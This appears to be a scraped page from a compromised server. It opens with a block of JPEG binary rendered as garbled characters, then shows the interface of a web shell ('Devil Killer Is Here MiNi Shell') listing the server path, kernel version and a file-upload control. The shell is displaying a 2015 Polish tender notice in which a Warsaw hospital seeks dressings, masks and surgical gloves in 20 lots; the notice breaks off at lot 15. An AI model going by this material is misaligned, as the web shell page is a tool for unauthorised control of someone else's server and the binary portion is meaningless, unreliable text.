JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150123/16452-N-2015.html

<p class="kh_header"><b>Warszawa: Dostawa materiałów opatrunkowych, ochronnych oraz rękawic chirurgicznych.</b><br>
<b>Numer ogłoszenia: 16452 - 2015; data zamieszczenia: 23.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Międzyleski Szpital Specjalistyczny w Warszawie , ul. Bursztynowa 2, 04-749 Warszawa, woj. mazowieckie, tel. 022 4735145, faks 022 6131992.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mssw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów opatrunkowych, ochronnych oraz rękawic chirurgicznych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa materiałów opatrunkowych, ochronnych oraz  rękawic chirurgicznych dla potrzeb Międzyleskiego Szpitala Specjalistycznego   w Warszawie, w asortymencie oraz ilościach wykazanych szczegółowo na załączonych do SIWZ Formularzach Cenowych w podziale na 20 grup zadaniowych.
2. Podaną ilość przedmiotu zamówienia należy traktować jako szacunkową, wstępną niezbędną do przeprowadzenia postępowania. Ostateczna wielkość przedmiotu zamówienia uzależniona będzie od rzeczywistych potrzeb Zamawiającego w okresie trwania umowy.
3. Oferta może dotyczyć wszystkich lub wybranych Zadań. Nie dopuszcza się składania ofert częściowych w obrębie poszczególnych Zadań.
4. Zamawiający nie dopuszcza składania ofert wariantowych.
5. Każdy Wykonawca ma prawo złożyć tylko jedną ofertę. Złożenie przez jednego Wykonawcę więcej niż jednej oferty lub oferty zawierającej alternatywy powoduje odrzucenie wszystkich ofert złożonych przez danego Wykonawcę.
6. Oferowany do przetargu asortyment wymieniony w Formularzach Cenowych musi być zgodny z opisem przedmiotu zamówienia oraz musi spełniać warunki dopuszczenia do obrotu w placówkach służby zdrowia zgodnie z obowiązującymi przepisami prawa.
7. W celu potwierdzenia zgodności oferowanego asortymentu z opisem przedmiotu  zamówienia, Wykonawca jest zobowiązany do dostarczenia do dnia i godziny składania ofert po dwie sztuki oferowanego asortymentu. Wszystkie dostarczone próbki muszą znajdować się w oryginalnym opakowaniu handlowym opatrzonym trwałym nadrukiem w języku polskim. Każdy asortyment należy opisać nieścieralnym pisakiem  - którego zadania i której pozycji dotyczy oraz nazwą   przedstawiającego go Wykonawcy. Próbki należy dostarczyć w oddzielnym opakowaniu opatrzonym danymi  Wykonawcy oraz zapisem Próbki do przetargu na dostawę materiałów opatrunkowych, ochronnych oraz rękawic chirurgicznych.  Znak sprawy D-5/N/15.
8. Oferty będą oceniane wg kryteriów podanych w pkt. XVI SIWZ.
9. Maksymalny termin dostawy wynosi 7 dni.
10. Jeżeli termin dostawy wypada w dzień wolny od pracy, dostawa winna nastąpić pierwszego dnia roboczego po tym terminie.
11. Realizacja zamówienia następować będzie przez okres 12 miesięcy od dnia zawarcia umowy z Wykonawcą wyłonionym w wyniku postępowania o udzielenie zamówienia publicznego.
12. Podwykonawstwo: 
a) Wykonawca może powierzyć wykonanie części zamówienia podwykonawcom.
b) Wykonawca jest zobowiązany wskazać w ofercie części zamówienia, których
wykonanie zamierza powierzyć podwykonawcom.
c) Zamawiający informuje, że nie zastrzega osobistego wykonania przez wykonawcę
kluczowych części zamówienia
13. Projekt umowy stanowiący Załącznik Nr 1 do SIWZ jest integralną częścią niniejszej dokumentacji i zapisy w niej zawarte traktuje się jako warunki udzielenia zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku posiadania wiedzy i doświadczenia Wykonawca wykaże minimum 2 główne dostawy odpowiadające wielkością oraz wartością przedstawionego przez Zamawiającego przedmiotu zamówienia. Jeżeli Wykonawca przystępuje do jednego lub więcej Zadań - minimum 2 główne dostawy odpowiadające wielkością oraz wartością przedstawionego przez Zamawiającego w tych zadaniach asortymentu. Wykaz dostaw należy przedstawić dla każdego Zadania osobno. Jeśli Wykonawca przystępuje do więcej niż jednego Zadania możliwe jest przedstawienie wykazu dostaw łącznie dla oferowanych Zadań, pod warunkiem, że dostawy zostały zrealizowane zgodnie z przedmiotem zamówienia oraz łączna wartość tych dostaw odpowiada łącznej wartości oferowanych Zadań.
Spełnienie warunku posiadania wiedzy i doświadczenia Zamawiający będzie oceniał:
- minimum 2 główne dostawy odpowiadające wielkością oraz wartością przedstawionego przez Zamawiającego w danych Zadaniach asortymentu - spełnia 
- mniej niż 2 główne dostawy odpowiadające wielkością oraz wartością przedstawionego przez Zamawiającego w danych Zadaniach asortymentu - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Formularz Ofertowy stanowiący Załącznik nr 2 do niniejszej specyfikacji wraz z wypełnionymi załącznikami - Formularze Cenowe.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostawy - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Wszelkie zmiany i uzupełnienia do niniejszej umowy mogą być dokonane za zgodą obu stron  wyrażoną na piśmie pod rygorem nieważności.
2.  Strony dopuszczają możliwość zmian umowy w następujących przypadkach:
2.1 Zmiana stron umowy.
2.2 Zmiana adresu.
2.3 Zmiana banków lub numerów kont bankowych stron.
2.4 Zmiana cen spowodowana zmianą stawki podatku VAT, przy czym zmianie ulegnie 
wyłącznie cena brutto, cena netto pozostanie bez zmian (obowiązuje od dnia wejścia w życie odpowiednich przepisów o zmianie stawki podatku VAT).
2.5 Zamiana oferowanych materiałów medycznych na materiały medyczne o właściwościach nie gorszych niż oferowane  w przypadku wycofania ich z rynku oraz wstrzymania produkcji (w cenie nie wyższej niż oferowane). 
2.6 Zamiana oferowanych materiałów medycznych na materiały medyczne o właściwościach nie gorszych niż oferowane w przypadku braku aktualnego dopuszczenia do obrotu na terenie Rzeczpospolitej Polskiej.
2.7 Zamawiający zastrzega sobie prawo do zmiany w okresie realizacji umowy, w zależności od jego rzeczywistych potrzeb ilości, z zastrzeżeniem niezmienności całkowitej wartości umowy określonej w § 2 ust. 1 umowy.
2.8 Dopuszcza się przedłużenie umowy w przypadku niewykorzystania środków finansowych określonych w umowie(zmiana terminu obowiązywania umowy).
2.9 Dopuszcza się zmianę cen jednostkowych na niższe niż oferowane w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mssw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Międzyleski Szpital Specjalistyczny w Warszawie ul. Bursztynowa 2, 04-741 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2015 godzina 11:00, miejsce: Kancelaria Międzyleskiego Szpitala Specjalistycznego w Warszawie ul. Bursztynowa 2, 04-741 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rękawice chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3 pozycje asortymentowe wykazane w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prześcieradło z laminatu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 pozycja asortymentowa wykazana w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Maski chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3 pozycje asortymentowe wykazane w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Ochraniacze na buty, spodenki z otworem do kolonoskopii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3 pozycje asortymentowe wykazane w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Prześcieradła i podkłady.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 5 pozycji asortymentowych wykazanych w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pokrowiec na mikroskop.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 pozycja asortymentowa wykazana w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Folie chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 pozycje asortymentowe wykazane w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Czepki chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3 pozycje asortymentowe wykazane w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Fartuchy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 5 pozycji asortymentowych wykazanych w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Opatrunki do zabiegów otolaryngologicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 pozycje asortymentowe wykazane w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Serwety operacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 pozycje asortymentowe wykazane w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Opatrunek parafinowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 pozycja asortymentowa wykazana w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Opatrunki do kaniul i wkłuć.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 8 pozycji asortymentowych wykazanych w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Preparaty do ochrony skóry.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 pozycje asortymentowe wykazane w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Opatrunki wyspowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 pozycje asortymentowe wykazane w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
